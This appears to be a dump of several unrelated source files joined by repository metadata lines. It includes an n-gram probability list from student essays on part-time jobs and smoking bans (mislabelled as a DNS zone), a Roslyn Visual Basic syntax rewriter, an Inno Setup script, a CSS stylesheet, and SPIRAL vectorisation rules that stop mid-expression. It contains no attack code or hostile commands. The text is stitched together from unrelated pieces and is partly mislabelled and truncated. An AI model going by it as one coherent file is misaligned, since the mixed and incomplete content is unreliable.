-1.2695947 together and sharing
-1.9587287 by the dorm
-1.710038 the same dorm
-0.97041446 you a permanent
-0.5417812 a permanent bond
-0.94449526 to fall behind
-0.94449526 be left behind
-0.7054753 lag significantly behind
-0.96602863 themselves it won
-1.7314224 because they won
-0.70563835 they won `
-0.5417812 won ` t
-2.4882603 able to participate
-1.7966484 time for awareness
-2.0201955 student is worried
-1.7411864 it fs terribly
-0.9255078 by without starving
-1.4023011 I would deem
-2.3353806 of a dollar
-2.0647686 <s> If dollar
-2.100974 that the 40
-0.9650539 30 or 40
-0.86376655 for around 40
-0.9709693 40 to 45
-1.9782741 for their exams
-0.8186068 , pass exams
-1.2248082 into social clicks
-0.70563835 , avoid drugs
-1.6874481 and social rejection
-2.3892295 they are thrown
-1.2537072 the working dogs
-2.5689857 for the remainder
-1.2015057 to other paths
-0.96889466 not for distracting
-1.2641429 which are distracting
-0.92548186 which was original
-2.3992348 a student decides
-1.8689821 that will deter
-0.9710908 excel , he\/she
-0.9597012 put all energies
-2.0538197 that is conducive
-0.8971586 student makes decisions
-0.96563625 decisions as open
-1.221267 a much larger
-0.9607388 to grow larger
-0.70563835 much larger possibility
-2.5528169 , the administration
-0.96952754 administration is treating
-2.347839 a job poses
-0.97041446 poses a threat
-0.97041446 quite a distracter
-1.2657207 a students boils
-0.84507585 to hold down
-0.54166937 students boils down
-0.77750957 days holding down
-1.2105547 is about networking
-1.2695947 grades and landing
-2.0201955 student is ideal
-1.6395347 and not properly
-0.96078736 any jobs properly
-0.8881657 anything done properly
-1.1435627 to eat properly
-0.9709693 resources to train
-1.7406356 on a temporary
-2.546066 in the pursuit
-1.212927 on his pursuit
-0.9502854 University studies lay
-2.1025329 student to forgo
-0.8186782 make him physically
-0.8426969 <s> Any forms
-0.97025436 forms of exhaustion
-0.96306306 suffering from exhaustion
-0.70563835 of exhaustion interferes
-1.4446744 concept of offering
-2.4202912 should be weighed
-0.7776412 this economic crisis
-0.63075274 find a middle
-0.9710474 workers , middle
-0.7776412 , middle aged
-0.70563835 , married couples
-1.3737625 and even elderly
-1.267528 society is heavily
-1.8856301 who are heavily
-0.54166937 their profits heavily
-1.2709996 debt , severely
-0.9539771 be so disparate
-0.9575429 eventually do dropout
-1.5693139 due to losing
-1.3682667 They become trapped
-2.3556416 with the image
-0.7776412 of material goods
-1.4138292 and an exciting
-1.0481644 have earned versus
-0.84262145 a disadvantage versus
-0.9708349 versus the boring
-1.269442 life of uninteresting
-2.548219 in the media
-1.2696514 within a typical
-0.970309 smaller and smaller
-0.9254592 is getting smaller
-1.2591032 family can possibly
-2.6843307 , and possibly
-0.70563835 can possibly gather
-1.3617146 students often seek
-1.4454614 forced to seek
-1.6004952 , many establishments
-0.77761716 at entertainment establishments
-0.970309 Restaurants and bars
-2.0335622 such as bars
-0.970309 beer and nightclubs
-0.9652262 bars or nightclubs
-1.2490816 be an obvious
-0.6219591 and most obvious
-1.5220007 be more attracted
-2.630871 to the lucrative
-0.9480326 to very lucrative
-0.70563835 the lucrative tips
-1.8616375 at a Las
-0.9694723 tables in Las
-0.34242433 a Las Vegas
-0.34242433 in Las Vegas
-0.8426969 Las Vegas casino
-2.0582547 would be mesmerized
-0.9703093 potential of winning
-2.1323423 at the tables
-2.5330536 is a nationwide
-0.5417812 a nationwide boom
-0.9654407 boom with Texas
-1.270913 Third , Texas
-0.34242433 with Texas Hold
-0.34242433 , Texas Hold
-0.3171513 Texas Hold eEm
-0.3171513 Hold eEm Poker
-0.9694723 Poker in North
-0.54174346 has swept North
-0.9702419 enter a poker
-0.89685124 become professional poker
-0.7774487 Playing online poker
-1.2197042 many young players
-0.7775762 professional poker players
-2.260049 of a diploma
-0.96581453 pursuing a diploma
-0.9480326 still very popular
-0.9539014 become so popular
-0.96644884 players have evolved
-1.7890856 you are skilled
-1.3955564 with some luck
-2.5504236 , the prize
-0.54174346 the grand prize
-0.9254905 This new trend
-0.94892174 trend has swept
-0.97038597 America and continues
-1.1843383 the new addictive
-0.5417812 new addictive drug
-1.2617884 You have access
-0.8426969 to play 24
-1.9164995 chance to win
-1.1442131 and ultimately win
-0.70563835 to win substantial
-0.8186782 substantial cash prizes
-0.7776412 a poker tournament
-0.9708349 win the grand
-1.2492541 for an incomplete
-1.1480799 having to worry
-0.9678614 much to worry
-1.2707573 willing to invest
-1.6383204 student will respond
-0.94556415 his\/her parents proud
-2.2551448 can be plainly
-2.066828 can be divided
-1.2391287 always be divided
-2.814478 of the goals
-0.54174346 long term goals
-0.87795234 were once established
-0.9556397 established when applying
-1.3661013 <s> My brother
-0.8186068 he finally dropped
-0.54174346 My brother dropped
-1.8051585 out of Northeastern
-0.96952105 University in Massachusetts
-0.70563835 after double majoring
-0.96952105 majoring in physics
-1.4184357 working at Disney
-0.9623362 fs working holiday
-0.9708349 Also the chances
-2.8066833 of the partying
-2.0322413 such as partying
-0.9650539 studying or partying
-0.95854473 other more serious
-1.8089019 <s> A budgeted
-1.2277694 parents could stem
-0.7776412 the partying funds
-1.0482743 should concentrate 100
-0.9596702 then this distracts
-2.4044886 is a reasonable
-1.8297209 at a reasonable
-2.0840614 at the restaurants
-0.9663688 Inside the restaurants
-1.525109 jobs in restaurants
-0.9388047 ban in restaurants
-0.4552181 smoking in restaurants
-0.9388047 sections in restaurants
-0.9701217 out to restaurants
-0.9646609 and on restaurants
-0.9638222 stores or restaurants
-0.9324817 customers at restaurants
-0.9324817 smoking at restaurants
-0.2478974 in all restaurants
-1.1025386 from all restaurants
-1.3280149 at all restaurants
-1.0461817 and non-smoking restaurants
-0.541139 that includes restaurants
-0.91470444 our friends whenever
-1.5671173 into a vicious
-1.5361018 Students should postpone
-1.4452091 entering the greal
-2.1573694 to do housework
-0.97038597 housework and chores
-0.96996903 place a ban
-0.45430523 reason to ban
-0.96748304 campaigns to ban
-0.70521736 an outright ban
-0.38060558 a total ban
-0.62177587 a smoking ban
-0.95398855 employers who employ
-1.6524273 time they possess
-1.269442 pursuit of Mammon
-0.9580144 Mammon fs glittering
-0.5417812 fs glittering bounty
-0.8885696 is both wrong-headed
-0.97038597 wrong-headed and short-sighted
-0.8186782 has ever known
-2.1600668 college student appreciates
-2.6336813 to the acquisition
-0.9596702 Interrupting this headlong
-0.5417812 this headlong charge
-0.96894807 charge for enlightenment
-1.269442 work of demons
-0.9657569 generations a man
-0.9657569 profit a man
-1.5479839 a young man
-0.94109654 lose his bursary
-0.94453686 <s> -LRB- Beware
-1.7033607 those who extol
-0.9703093 day of reckoning
-0.8453008 spend every waking
-0.8186782 waking hour digesting
-0.8885696 the great dollops
-0.9703093 dollops of nourishing
-0.5417812 of nourishing scholarship
-0.5417812 nourishing scholarship fed
-0.70563835 concerned teaching assistants
-0.70563835 is newly coined
-2.2979906 to be dispensed
-0.97038597 dispensed and mastered
-0.70563835 If dollar signs
-0.96771944 signs are dancing
-1.94782 , if raw
-0.5417812 if raw cupidity
-0.5417812 raw cupidity corrupts
-0.94109654 corrupts his soul
-1.94782 , if contemplating
-0.5417812 if contemplating materialist
-0.5417812 contemplating materialist purchases
-0.5417812 materialist purchases disturbs
-0.9596702 Disrupting this evolving
-0.5417812 this evolving relationship
-0.95859265 study by saddling
-0.9708349 saddling the questing
-1.2695354 obtaining a minimum
-0.9710474 menial , minimum
-0.70563835 minimum wage drudgery
-1.6743882 , by interfering
-2.3556416 with the ceaseless
-0.5417812 the ceaseless cogitation
-1.3968394 , one embraces
-0.96005386 embraces an obscene
-0.5417812 an obscene perversion
-2.0538197 that is holy
-0.9708349 To the carrels
-0.96894807 stand for undivided
-0.9306314 his academic attention
-0.54174346 for undivided attention
-0.9502854 our studies across
-0.9254905 our new barricades
-0.70563835 the so-called gGreat
-0.5417812 so-called gGreat Works
-0.8186068 Works h \
-0.54174346 and misogyny \
-0.70563835 h \ rightly
-0.5417812 \ rightly unread
-2.3159316 to their relentless
-0.5417812 their relentless racism
-0.97038597 racism and misogyny
-0.9348586 be our cobblestones
-1.5697957 world , unite
-0.7776412 will essentially shape
-0.97038597 for and passing
-0.5417812 and passing examinations
-0.70563835 at convenience stores
-0.9447781 to stay awake
-1.531915 to them failing
-0.92549914 even being asked
-1.2663147 anything that obstructs
-2.4202912 should be discouraged
-0.97041446 education a tool
-1.2663965 put their sons
-0.9653139 sons or daughters
-1.4391036 have their dreams
-0.5417812 their dreams dashed
-0.9655893 effort on behalf
-1.8380213 not only hurting
-1.6741663 but also destroying
-1.2678738 part-time in low-skilled
-2.4882603 able to flip
-0.877903 no importance whatsoever
-1.84251 may not pertain
-2.546066 in the U.S.
-1.2246652 In most U.S.
-1.2597992 I will voice
-2.0201955 student is admitted
-0.5417812 <s> Conversely speaking
-2.548219 in the United
-0.5417812 the United States
-0.96671176 quite time consuming
-1.9262036 the time commuting
-0.9694666 classes is merely
-1.6721942 rather than merely
-1.2704892 even the obligatory
-2.0379982 order to sustain
-1.0482398 a healthy existence
-2.0921752 they will eat
-2.0784652 time to eat
-2.0476751 them to eat
-1.2549186 place to eat
-0.96005267 where people eat
-0.9655786 -LRB- as opposed
-1.4532362 I am opposed
-0.96952754 much is taken-on
-2.0020587 may be compromised
-0.96550435 complete with excellence
-0.96889466 finishing for finishing
-0.7055833 than merely finishing
-0.70563835 for finishing sake
-2.061142 not be burdened
-1.4436442 responsibility of fiscal
-1.6106554 and that none
-0.9594153 seems that none
-0.9623525 none should assume
-2.8185043 of the academically
-0.5417812 the academically minded
-1.8089019 <s> A high-school
-0.8778697 student generally focuses
-0.9703093 attention of mastering
-2.5528169 , the foremost
-1.2796856 to explore concepts
-0.7776412 much greater detail
-0.9694723 an in depth
-0.970309 detail and depth
-0.97038597 thought and analysis
-0.97076845 Balancing the mundane
-0.96306306 free from mundane
-0.96857595 feel that holding
-0.97014666 realities of holding
-1.451693 college days holding
-1.4981937 will only distract
-0.8777878 will simply distract
-2.6879861 , and hamstring
-0.70563835 the overall efficacy
-0.7776412 with developing himself
-0.9710908 stable , confident
-1.349635 will be plenty
-0.96544003 days will negatively
-0.8778697 impact long term
-0.8452535 in times past
-0.8777878 are long past
-0.9348586 In our father
-0.97038597 fs and grandfather
-1.5699875 work to supply
-0.97041446 supply a modest
-0.97025436 family of five
-1.4454614 come to five
-0.94109654 allow his wife
-1.7395061 home and carrying
-2.3556416 with the entrance
-1.7421509 into the work-force
-0.5417812 the work-force coupled
-1.6469297 has become near
-0.54174346 I graduated near
-1.2707573 impossible to adequately
-2.3364315 of a four-year
-0.9653139 man or woman
-0.8970779 of fully dedicating
-0.92243314 Achieving high marks
-1.7211647 , time devoted
-2.4202912 should be safe-guarded
-2.6336813 to the maximum
-1.6414187 and not diluted
-0.9654407 diluted with worries
-0.7055833 from mundane worries
-0.7776412 or schedules associated
-0.97038597 obtain and hold-down
-2.1296859 is the ultimate
-1.3098111 am against anybody
-0.8885696 make great advances
-0.9433873 will become distracted
-1.6567447 they get distracted
-1.2597992 studies will falter
-2.3159316 to their schoolwork
-0.9710908 nights , standing
-2.4549673 in a hurry
-1.2637693 even be pressured
-0.97038597 years and running
-0.845408 of becoming overwhelmed
-0.89710486 A financially strapped
-0.8453008 reduce his\/her reliance
-1.4023011 it would behoove
-0.9710908 following , valid
-0.5417812 , valid counter-argument
-1.269442 is of paramount
-1.7396736 become a doctor
-0.96514726 I can tolerate
-1.5693139 means to repay
-2.401044 , I seriously
-0.5417812 I seriously jeopardize
-1.5887454 <s> To coin
-0.96952105 currently in vogue
-2.3173888 <s> The expression
-0.54174346 in vogue expression
-0.9710908 expression , gI
-0.8778697 gI am robbing
-0.5417812 am robbing Peter
-1.7539203 to pay Paul
-0.5417812 pay Paul h.
-1.6404386 during college rests
-2.3192668 <s> The onus
-2.0303597 , as innumerable
-1.2695947 -LRB- and enlightened
-1.6340977 I was 18
-1.5516561 would have liked
-1.919632 it is nonetheless
-1.445843 is , nonetheless
-0.93925536 A better approach
-2.145156 <s> This approach
-0.5415809 complete opposite approach
-0.5415809 a rational approach
-1.639368 as I graduated
-1.4452091 pay the bills
-0.97041446 make a smooth
-1.1188048 be learned here
-0.88812464 rings true here
-0.87743556 main problem here
-0.5415809 be examined here
-1.2455192 have already started
-0.96203786 some money aside
-0.54174346 <s> Putting aside
-1.566702 that of etime
-0.9556397 study when workloads
-0.96952105 high in volume
-1.7415998 work a shift
-0.5417812 a shift afterwards
-0.70563835 The expression ehealthy
-0.5417812 expression ehealthy body
-0.8885696 mind f rings
-2.3892295 they are fatigued
-0.96313107 fatigued from over-exertion
-2.1323423 at the weekend
-2.189477 they have availability
-1.2485076 but this negates
-2.3364315 of a 5-day
-1.9554842 with a 6
-0.96952754 problem is compounded
-1.6540626 and that single
-1.2667356 required for relaxation
-2.2979906 to be held
-0.7776412 are rarely relied
-0.8186782 by anyone else
-2.4882603 able to utilize
-2.594901 have a detrimental
-2.3320854 on their outlook
-2.001421 lead to feelings
-0.9710908 frustration , depression
-1.5516689 or even pessimism
-2.2979906 to be honest
-1.2602372 wish I hadn
-1.2663965 change their perspective
-0.9623362 up working 30
-0.97038597 week and hardly
-1.5693139 trying to catch
-1.2602372 which I ended
-1.2600931 spent on cars
-0.9710474 cars , fancy
-0.9579728 did my fancy
-0.9710908 clothes , cigarettes
-0.9710908 cigarettes , beer
-0.8886119 finally did drop
-0.96566236 employers I interviewed
-0.96550435 interviewed with cared
-2.2413182 as a bartender
-0.9447781 fancy clothes impress
-0.9710908 sure , anti-smoking
-0.7776412 Japan currently lag
-0.95589554 smoking would significantly
-0.54174346 currently lag significantly
-0.8453008 other developed nations
-1.0065018 and further progress
-0.9657569 Yet a total
-0.9657569 Implementing a total
-0.63090694 reduce the total
-1.4049516 say that smoking
-1.1312816 believe that smoking
-2.0916193 , a smoking
-2.1310654 of a smoking
-0.95611274 contracting a smoking
-0.96903455 risks , smoking
-1.5565242 effects of smoking
-1.9480665 for their smoking
-1.3126934 Of course smoking
-0.91499764 on restaurant smoking
-0.5376871 ban on smoking
-1.2207794 restrictions on smoking
-0.9311158 not themselves smoking
-2.0226793 I believe smoking
-0.8778926 taking up smoking
-0.8778926 give up smoking
-1.2699889 to quit smoking
-1.2853183 is always smoking
-0.7745659 as regular smoking
-0.87427455 already banned smoking
-0.30733097 to ban smoking
-0.15623896 for banning smoking
-0.233282 , banning smoking
-0.233282 by banning smoking
-0.15623896 of banning smoking
-0.5399919 is passive smoking
-0.5399919 <s> Banning smoking
-0.5399919 to discourage smoking
-0.5399919 to introduce smoking
-0.5399919 to segregate smoking
-0.9559639 and would undoubtedly
-0.7776412 meet considerable resistance
-0.9328095 virtually no restrictions
-0.54174346 , partial restrictions
-1.2413292 restaurants would represent
-0.8885845 the complete opposite
-0.9514415 Between these polar
-0.5417812 these polar extremes
-0.9447781 a middle route
-1.0482398 is certainly advisable
-0.9709693 advisable to urge
-2.7230322 of the smoke
-1.2665644 amounts of smoke
-1.5625769 not to smoke
-1.7635506 them to smoke
-1.1946555 place to smoke
-0.93114495 individual to smoke
-1.4291619 allowed to smoke
-1.3362124 choose to smoke
-1.512289 wish to smoke
-0.93114495 rights to smoke
-1.1946555 exposure to smoke
-0.9046809 , who smoke
-1.4793116 those who smoke
-1.1521136 can still smoke
-0.88677007 second hand smoke
-0.34194267 , breathing smoke
-0.34194267 - breathing smoke
-0.70418733 are inhaling smoke
-0.21864995 that second-hand smoke
-0.21864995 of second-hand smoke
-0.21864995 to second-hand smoke
-0.77592903 to tobacco smoke
-0.23563899 <s> Tobacco smoke
-0.54078573 people breathe smoke
-0.54078573 of secondhand smoke
-1.270913 so , regardless
-1.999989 , but regardless
-0.454951 health and well-being
-1.904193 , in considering
-2.474476 of the rights
-2.368377 to the rights
-1.7569928 against the rights
-0.9687079 within their rights
-1.353842 and health concerns
-1.6070328 In many places
-0.96748435 Restaurants are places
-0.6092521 in public places
-0.6092521 all public places
-1.5697957 world , partial
-1.6262265 reasons for banning
-0.9598097 justification for banning
-0.9707589 arguments , banning
-0.9580587 solely by banning
-0.96497023 effect of banning
-1.549747 purpose of banning
-0.8633952 without completely banning
-1.3568981 have been implemented
-2.2551448 can be legally
-0.5417812 be legally compelled
-1.5668873 provide a separate
-0.88862646 into two separate
-0.9710908 separate , ventilated
-0.5417812 , ventilated room
-0.9709698 of restaurant patrons
-0.7952932 those restaurant patrons
-0.94726676 their smoking patrons
-2.217416 , or alternatively
-0.94965845 afford such renovations
-0.4549004 smoking and non-smoking
-1.7775552 health of non-smoking
-0.96522456 comfort of non-smoking
-0.8968245 a fully non-smoking
-0.8453008 fully non-smoking establishment
-1.2455192 have already built
-0.94965845 built such facilities
-0.8186782 the current lax
-0.5417812 current lax standards
-0.70563835 a nice meal
-0.9255078 meal without exposing
-1.3220913 of getting cancer
-0.9710908 cancer , asthma
-1.2015057 and other respiratory
-1.4452091 are the worst
-0.5417812 the worst sufferers
-2.814478 of the ill
-0.8777878 become quite ill
-1.5673865 consider the effects
-0.9303269 negative health effects
-0.70534635 the ill effects
-0.5415809 clearly harmful effects
-0.8426969 <s> Smoking alone
-0.5417812 Smoking alone kills
-1.1342123 and makes hundreds
-1.2482166 of them sick
-0.9424286 banned because nowadays
-1.1842161 seems like everywhere
-1.0481644 the law everywhere
-1.270913 restaurants , breathing
-0.8186068 smoke - breathing
-1.269442 loss of appetite
-1.7148496 and it smells
-0.95353854 means some harm
-0.96514726 Nothing can justify
-2.630871 to the interference
-0.54174346 can justify interference
-1.4310355 is it justified
-0.54174346 are perfectly justified
-0.9650865 smoke can affect
-0.87781 smoke does affect
-2.5330536 is a moral
-0.84262145 a reasonable justification
-0.54174346 a moral justification
-2.8185043 of the @
-0.97038597 aware and guide
-1.2590392 -LRB- or choices
-1.5940906 the right choices
-0.7054753 similarly wise choices
-0.9708349 therefore the warnings
-2.3053756 and the campaigns
-0.96771944 smoking are perfectly
-1.5636237 smoking is passive
-1.7886008 you are inhaling
-1.3218164 is like inhaling
-1.6662002 smoke , unknowingly
-0.96771944 unknowingly are affecting
-0.9708349 within the premise
-2.5330536 is a rational
-2.8185043 of the employee
-0.9255064 countries like UK
-0.97038597 UK and parts
-0.9703093 parts of US
-0.9307381 a health conscious
-0.8453008 wants healthy citizens
-1.7207206 all restaurants despite
-1.3100164 it means infringement
-0.96857595 effect that second-hand
-1.5660601 effects of second-hand
-1.2704629 exposure to second-hand
-0.9708606 mind , non-smokers
-1.8044913 health of non-smokers
-0.96529967 has on non-smokers
-1.8840929 who are non-smokers
-1.5220007 are more prone
-1.5621343 good for smokers
-2.056268 not be smokers
-0.9704825 than the smokers
-0.9271531 number of smokers
-1.7768588 health of smokers
-2.5249763 have a smoke-free
-1.2605371 enjoy a smoke-free
-1.8689821 that will occur
-1.2695947 restaurants and potentially
-0.9703093 week of unwanted
-0.54174346 of unwanted exposure
-0.54174346 <s> Regular exposure
-2.073563 is that tobacco
-0.9708217 customers to tobacco
-0.94712085 course smoking tobacco
-2.548219 in the air
-1.443957 has a definite
-2.0538197 that is served
-2.3192668 <s> The smell
-0.8186782 smoke becomes entangled
-1.5693139 hard to tell
-0.9282507 food really tastes
-0.87781 is banned altogether
-0.9348126 non-smoking restaurants altogether
-1.5687809 consider the welfare
-1.6540626 and that includes
-2.531173 is a poison
-0.54174346 a habit-forming poison
-0.44458324 reason being anywhere
-0.3171513 being anywhere close
-1.3766972 Tobacco smoke permeates
-0.5417812 smoke permeates foods
-0.9602795 when people breathe
-2.3423157 , it alters
-2.5330536 is a habit-forming
-1.8048636 and a stimulant
-1.2496934 Many people react
-0.5417812 people react violently
-2.189477 they have heard
-1.6777825 in a smoky
-1.3351636 is too smoky
-1.2610925 's not fair
-0.9366768 goes through withdrawal
-0.5417812 through withdrawal pains
-1.3682667 They become addicted
-1.9548753 is an insult
-1.5671173 also a safety
-1.2709996 law , selfish
-0.96894807 arguments for implementing
-0.9674512 all be examined
-2.0754464 is that concerning
-0.97076845 made the wise
-0.7055833 made similarly wise
-1.238976 , be forced
-1.9353607 not be forced
-1.2641429 people are forced
-1.44561 forced to compromise
-0.7776412 wise choices regarding
-1.7034411 their own lifestyles
-0.9709693 government to discourage
-0.94732565 Perhaps most importantly
-0.94460577 taken into account
-2.4549673 in a smoke-filled
-2.061142 not be ignored
-0.9710908 additional , long-term
-2.3714485 on the national
-0.5417812 the national healthcare
-0.70563835 to seek treatment
-0.96894807 treatment for tobacco-related
-0.5417812 for tobacco-related illnesses
-1.5470109 it 's context
-0.9307304 arguments ; firstly
-0.9709693 restaurants to promote
-0.9674895 improve the comfort
-0.9674895 promote the comfort
-1.0482398 of non-smoking diners
-0.8426969 <s> Despite proven
-0.70563835 very popular amongst
-0.9597012 amongst all ages
-0.9473217 highly social pastime
-1.6473839 has become deeply
-0.5417812 become deeply integrated
-0.9703093 chance of passively
-0.5417812 of passively contracting
-0.9099368 smoking related illness
-0.93079174 perhaps too severe
-0.96877724 damage their profits
-1.44561 be to introduce
-1.0482398 and non-smoking sections
-1.5693139 or to segregate
-0.95028013 environment which suits
-0.9709693 businesses to succeed
-0.93973964 brought about gradually
-1.6743882 , by improving
-2.8185043 of the clearly
-0.5417812 the clearly harmful
-1.566702 effects of secondhand
\end\
| DNS Zone | 1 | Lolik111/meta | data/english-sentences.arpa | [
"MIT"
] |
' Licensed to the .NET Foundation under one or more agreements.
' The .NET Foundation licenses this file to you under the MIT license.
' See the LICENSE file in the project root for more information.
Imports Microsoft.CodeAnalysis.Syntax.InternalSyntax
Namespace Microsoft.CodeAnalysis.VisualBasic.Syntax.InternalSyntax
Partial Friend MustInherit Class VisualBasicSyntaxVisitor
Public Overridable Function VisitSyntaxToken(token As SyntaxToken) As SyntaxToken
Debug.Assert(token IsNot Nothing)
Return token
End Function
Public Overridable Function VisitSyntaxTrivia(trivia As SyntaxTrivia) As SyntaxTrivia
Debug.Assert(trivia IsNot Nothing)
Return trivia
End Function
End Class
Partial Friend Class VisualBasicSyntaxRewriter
Inherits VisualBasicSyntaxVisitor
Public Function VisitList(Of TNode As VisualBasicSyntaxNode)(list As CodeAnalysis.Syntax.InternalSyntax.SyntaxList(Of TNode)) As CodeAnalysis.Syntax.InternalSyntax.SyntaxList(Of TNode)
Dim alternate As SyntaxListBuilder(Of TNode) = Nothing
Dim i As Integer = 0
Dim n As Integer = list.Count
Do While (i < n)
Dim item As TNode = list.Item(i)
Dim visited As TNode = DirectCast(Me.Visit(item), TNode)
If item IsNot visited AndAlso alternate.IsNull Then
alternate = New SyntaxListBuilder(Of TNode)(n)
alternate.AddRange(list, 0, i)
End If
If Not alternate.IsNull Then
If visited IsNot Nothing AndAlso visited.Kind <> SyntaxKind.None Then
alternate.Add(visited)
End If
End If
i += 1
Loop
If Not alternate.IsNull Then
Return alternate.ToList()
End If
Return list
End Function
Public Function VisitList(Of TNode As VisualBasicSyntaxNode)(list As CodeAnalysis.Syntax.InternalSyntax.SeparatedSyntaxList(Of TNode)) As CodeAnalysis.Syntax.InternalSyntax.SeparatedSyntaxList(Of TNode)
Dim alternate As SeparatedSyntaxListBuilder(Of TNode) = Nothing
Dim i As Integer = 0
Dim itemCount As Integer = list.Count
Dim separatorCount As Integer = list.SeparatorCount
While i < itemCount
Dim item = list(i)
Dim visitedItem = Me.Visit(item)
Dim separator As GreenNode = Nothing
Dim visitedSeparator As GreenNode = Nothing
If (i < separatorCount) Then
separator = list.GetSeparator(i)
' LastTokenReplacer depends on us calling Visit rather than VisitToken for separators.
' It is not clear whether this is desirable/acceptable.
Dim visitedSeparatorNode = Me.Visit(DirectCast(separator, VisualBasicSyntaxNode))
Debug.Assert(TypeOf visitedSeparatorNode Is SyntaxToken, "Cannot replace a separator with a non-separator")
visitedSeparator = DirectCast(visitedSeparatorNode, SyntaxToken)
Debug.Assert((separator Is Nothing AndAlso separator.RawKind = SyntaxKind.None) OrElse
(visitedSeparator IsNot Nothing AndAlso visitedSeparator.RawKind <> SyntaxKind.None),
"Cannot delete a separator from a separated list. Removing an element will remove the corresponding separator.")
End If
If (item IsNot visitedItem OrElse separator IsNot visitedSeparator) AndAlso alternate.IsNull Then
alternate = New SeparatedSyntaxListBuilder(Of TNode)(itemCount)
alternate.AddRange(list, i)
End If
If Not alternate.IsNull Then
If visitedItem IsNot Nothing AndAlso visitedItem.Kind <> SyntaxKind.None Then
alternate.Add(DirectCast(visitedItem, TNode))
If visitedSeparator IsNot Nothing Then
alternate.AddSeparator(visitedSeparator)
End If
ElseIf i >= separatorCount AndAlso alternate.Count > 0 Then ' last element deleted
alternate.RemoveLast() ' delete *preceding* separator
End If
End If
i += 1
End While
If Not alternate.IsNull Then
Return alternate.ToList()
End If
Return list
End Function
End Class
End Namespace
| Visual Basic | 5 | ffMathy/roslyn | src/Compilers/VisualBasic/Portable/Syntax/InternalSyntax/VisualBasicSyntaxRewriter.vb | [
"MIT"
] |
#define MyAppName "UIB Database Tool"
#define MyAppVerName "UIB Database Tool 1.0"
#define MyAppPublisher "progdigy.com"
#define MyAppURL "http://www.progdigy.com"
[Setup]
AppName={#MyAppName}
AppVerName={#MyAppVerName}
AppPublisher={#MyAppPublisher}
AppPublisherURL={#MyAppURL}
AppSupportURL={#MyAppURL}
AppUpdatesURL={#MyAppURL}
DefaultDirName={pf}\UIBDatabaseTool
DefaultGroupName=My Program
OutputBaseFilename=setup
Compression=lzma
SolidCompression=yes
[Files]
Source: "D:\developpement\UIBUtil\UIBFileHandler.dll"; DestDir: "{app}"; Flags: ignoreversion regserver
| Inno Setup | 2 | ycq323/alcinoe | references/UIB/misc/ShellExtention/setup.iss | [
"Apache-2.0"
] |
.App {
font-family: sans-serif;
max-width: 500px;
}
.section {
padding: 10px;
border: 1px solid purple;
border-radius: 4px;
margin-bottom: 20px;
}
label,
input {
display: block;
}
label,
button {
margin-top: 1rem;
}
| CSS | 3 | northflank/formik | examples/dependent-fields/styles.css | [
"Apache-2.0"
] |
# Copyright (c) 2018-2021, Carnegie Mellon University
# See LICENSE for details
NewRulesFor(TConjEven, rec(
TConjEven_vec := rec(
switch := true,
applicable := (self, t) >> IsEvenInt(t.params[1]) and t.isTag(1, AVecReg) and
t.params[1] mod (2*t.getTag(1).v) = 0,
apply := (self, t, C, Nonterms) >> let(N := t.params[1], v := t.getTag(1).v, rot := t.params[2],
m := Mat([[1,0],[0,-1]]),
# d1 := Diag(diagDirsum(fConst(TReal, 2, 1.0), fConst(TReal, N-2, 1/2))),
d1 := VDiag(diagDirsum(fConst(TReal, 1, 1.0), fConst(TReal, v-1, 0.5), fConst(TReal, 1, 1.0), fConst(TReal, N-v-1, 0.5)), v),
#m1 := DirectSum(m, SUM(I(N-2), Tensor(J((N-2)/2), m))),
#dv1 := Diag(diagDirsum(fConst(TReal, v, 1.0), fConst(TReal, 1,-1.0), fConst(TReal, N-v-1, 1.0))),
dv1 := DirectSum(VTensor(I(1), v),
VBlk([[ [-1.0] :: Replicate(v-1, 1.0) ]], v),
VTensor(I(N/v-2), v)),
P1 := VPrm_x_I(L(N/v, N/(2*v)), v),
Q1 := VPrm_x_I(L(N/v, 2), v),
jv1 := P1*DirectSum(VO1dsJ(N/2, v), VScale(VO1dsJ(N/2, v), -1, v))*Q1,
mv1 := _VSUM([dv1,jv1], v),
#m2 := DirectSum(J(2), SUM(I(N-2), Tensor(J((N-2)/2), -m))),
e0 := [0.0] :: Replicate(v-1, 1.0),
e1 := [1.0] :: Replicate(v-1, 0.0),
blk := VBlk([[e0,e1],[e1,e0]], v).setSymmetric(),
dv2 := DirectSum(blk, VTensor(I(N/v-2), v)),
jv2 := P1 * DirectSum(VScale(VO1dsJ(N/2, v), -1, v), VO1dsJ(N/2, v))*Q1,
mv2 := _VSUM([dv2,jv2], v),
#
i := VTensor(I(N/v), v),
d2 := VRCLR(Diag(fPrecompute(diagDirsum(fConst(TReal, 1, 1.0), diagMul(fConst(TComplex, N/2-1, omegapi(-1/2)), fCompose(dOmega(N, rot), fAdd(N/2, N/2-1, 1)))))), v),
#
#d1 *
VBlkInt(d1 * _VHStack([mv1, mv2], v) * VStack(i, d2), v))
),
TConjEven_vec_tr := rec(
switch := true,
applicable := (self, t) >> IsEvenInt(t.params[1]) and t.isTag(1, AVecReg) and t.params[1] mod (2*t.getTag(AVecReg).v)=0,
transposed := true,
apply := (self, t, C, Nonterms) >> let(N := t.params[1], v := t.getTag(1).v, rot := t.params[2],
m := Mat([[1,0],[0,-1]]),
# d1 := Diag(diagDirsum(fConst(TReal, 2, 1.0), fConst(TReal, N-2, 1/2))),
d1 := VDiag(diagDirsum(fConst(TReal, 1, 1.0), fConst(TReal, v-1, 0.5), fConst(TReal, 1, 1.0), fConst(TReal, N-v-1, 0.5)), v),
#m1 := DirectSum(m, SUM(I(N-2), Tensor(J((N-2)/2), m))),
#dv1 := Diag(diagDirsum(fConst(TReal, v, 1.0), fConst(TReal, 1,-1.0), fConst(TReal, N-v-1, 1.0))),
dv1 := DirectSum(VTensor(I(1), v),
VBlk([[ [-1.0] :: Replicate(v-1, 1.0) ]], v),
VTensor(I(N/v-2), v)),
P1 := VPrm_x_I(L(N/v, N/(2*v)), v),
Q1 := VPrm_x_I(L(N/v, 2), v),
jv1 := P1*DirectSum(VO1dsJ(N/2, v), VScale(VO1dsJ(N/2, v), -1, v))*Q1,
mv1 := _VSUM([dv1,jv1], v),
#m2 := DirectSum(J(2), SUM(I(N-2), Tensor(J((N-2)/2), -m))),
e0 := [0.0] :: Replicate(v-1, 1.0),
e1 := [1.0] :: Replicate(v-1, 0.0),
blk := VBlk([[e0,e1],[e1,e0]], v).setSymmetric(),
dv2 := DirectSum(blk, VTensor(I(N/v-2), v)),
jv2 := P1 * DirectSum(VScale(VO1dsJ(N/2, v), -1, v), VO1dsJ(N/2, v))*Q1,
mv2 := _VSUM([dv2,jv2], v),
#
i := VTensor(I(N/v), v),
